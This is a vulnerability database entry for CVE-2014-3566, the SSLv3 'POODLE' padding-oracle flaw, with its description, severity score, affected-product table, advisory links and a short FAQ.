Vulnerability Description
The SSL protocol 3.0, as used in OpenSSL through 1.0.1i and other products, uses nondeterministic CBC padding, which makes it easier for man-in-the-middle attackers to obtain cleartext data via a padding-oracle attack, aka the "POODLE" issue.
CVSS Score
LOW
Affected Products
| Vendor | Product | Versions |
|---|---|---|
| Redhat | Enterprise Linux | 5 |
| Redhat | Enterprise Linux Desktop | 6.0 |
| Redhat | Enterprise Linux Desktop Supplementary | 5.0 |
| Redhat | Enterprise Linux Server | 6.0 |
| Redhat | Enterprise Linux Server Supplementary | 5.0 |
| Redhat | Enterprise Linux Workstation | 6.0 |
| Redhat | Enterprise Linux Workstation Supplementary | 6.0 |
| Ibm | Aix | 5.3 |
| Apple | Mac Os X | <= 10.10.1 |
| Mageia | Mageia | 3.0 |
| Novell | Suse Linux Enterprise Desktop | 9.0 |
| Novell | Suse Linux Enterprise Software Development Kit | 11.0 |
| Novell | Suse Linux Enterprise Server | 11.0 |
| Opensuse | Opensuse | 12.3 |
| Fedoraproject | Fedora | 19 |
| Openssl | Openssl | 0.9.8 |
| Ibm | Vios | 2.2.0.10 |
| Netbsd | Netbsd | 5.1 |
| Debian | Debian Linux | 7.0 |
| Oracle | Database | 11.2.0.4 |
Related Weaknesses (CWE)
References
- ftp://ftp.netbsd.org/pub/NetBSD/security/advisories/NetBSD-SA2014-015.txt.ascThird Party Advisory
- http://advisories.mageia.org/MGASA-2014-0416.htmlThird Party Advisory
- http://aix.software.ibm.com/aix/efixes/security/openssl_advisory11.ascThird Party Advisory
- http://archives.neohapsis.com/archives/bugtraq/2014-10/0101.htmlThird Party Advisory
- http://archives.neohapsis.com/archives/bugtraq/2014-10/0103.htmlThird Party Advisory
- http://askubuntu.com/questions/537196/how-do-i-patch-workaround-sslv3-poodle-vulThird Party Advisory
- http://blog.cryptographyengineering.com/2014/10/attack-of-week-poodle.htmlThird Party Advisory
- http://blog.nodejs.org/2014/10/23/node-v0-10-33-stable/Third Party Advisory
- http://blogs.technet.com/b/msrc/archive/2014/10/14/security-advisory-3009008-relThird Party Advisory
- http://docs.ipswitch.com/MOVEit/DMZ82/ReleaseNotes/MOVEitReleaseNotes82.pdfThird Party Advisory
- http://downloads.asterisk.org/pub/security/AST-2014-011.htmlThird Party Advisory
- http://googleonlinesecurity.blogspot.com/2014/10/this-poodle-bites-exploiting-ssThird Party Advisory
- http://h20564.www2.hp.com/hpsc/doc/public/display?docId=emr_na-c04583581Third Party Advisory
- http://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c04779034Third Party Advisory
- http://kb.juniper.net/InfoCenter/index?page=content&id=JSA10705Third Party Advisory
FAQ
What is CVE-2014-3566?
CVE-2014-3566 is a vulnerability with a CVSS score of 3.4 (LOW). The SSL protocol 3.0, as used in OpenSSL through 1.0.1i and other products, uses nondeterministic CBC padding, which makes it easier for man-in-the-middle attackers to obtain cleartext data via a padd...
How severe is CVE-2014-3566?
CVE-2014-3566 has been rated LOW with a CVSS base score of 3.4/10. Review the CVSS metrics above for detailed severity breakdown.
Is there a patch for CVE-2014-3566?
Check the references section above for vendor advisories and patch information. Affected products include: Redhat Enterprise Linux, Redhat Enterprise Linux Desktop, Redhat Enterprise Linux Desktop Supplementary, Redhat Enterprise Linux Server, Redhat Enterprise Linux Server Supplementary.